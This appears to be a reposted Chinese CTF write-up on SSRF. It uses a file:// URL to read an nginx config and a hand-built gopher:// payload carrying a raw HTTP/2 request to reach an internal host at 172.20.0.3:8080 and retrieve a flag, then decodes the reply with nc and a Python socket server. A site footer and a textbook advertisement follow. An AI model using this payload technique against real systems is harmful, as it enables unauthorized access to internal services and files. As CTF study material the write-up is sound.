内容简介:curl –http2-prior-knowledge:可以在不升级HTTP/1.1的情况下使用HTTP2。
url=file:///etc/nginx/sites-enabled/default
使用 gopher 构造构造 http2 协议访问 172.20.0.3:8080 。
本地监听http2请求包
nc -lvvp 8000>1.txt
curl –http2-prior-knowledge:可以在不升级HTTP/1.1的情况下使用HTTP2。
$ curl --http2-prior-knowledge http://127.0.0.1:8000/
构造gopher协议
gopher://172.20.0.3:8080/_PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A%2500%2500%2512%2504%2500%2500%2500%2500%2500%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501%2500%2500%251E%2501%2505%2500%2500%2500%2501%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A
然后把返回的数据保存到文件 flag.txt 中
模拟HTTP2请求过程,对刚才返回的数据进行解码。
nc -lvvp 8000 < flag.txt
也可以像f1sh师傅一样用 python 启一个socket服务。
import socket
a = open("flag.txt", "rb").read()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 8000
s.bind((host, port))
s.listen(5)
while True:
c, addr = s.accept()
c.send(a)
curl --http2-prior-knowledge http://127.0.0.1:8000 -v
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
数据库系统实现
加西亚-莫利纳(Hector Garcia-Molina)、Jeffrey D.Ullman、Jennifer Widom / 杨冬青、吴愈青、包小源 / 机械工业出版社 / 2010-5 / 59.00元
《数据库系统实现(第2版)》是斯坦福大学计算机科学专业数据库系列课程第二门课的教科书。书中对数据库系统实现原理进行了深入阐述,并具体讨论了数据库管理系统的三个主要成分——存储管理器、查询处理器和事务管理器的实现技术。此外,第2版充分反映了数据管理技术的新进展,对内容进行了扩充,除了在第1版中原有的“信息集成”一章(第10章)中加入了新的内容外,还增加了两个全新的章:“数据挖掘”(第11章)和“数据......一起来看看 《数据库系统实现》 这本书的介绍吧!
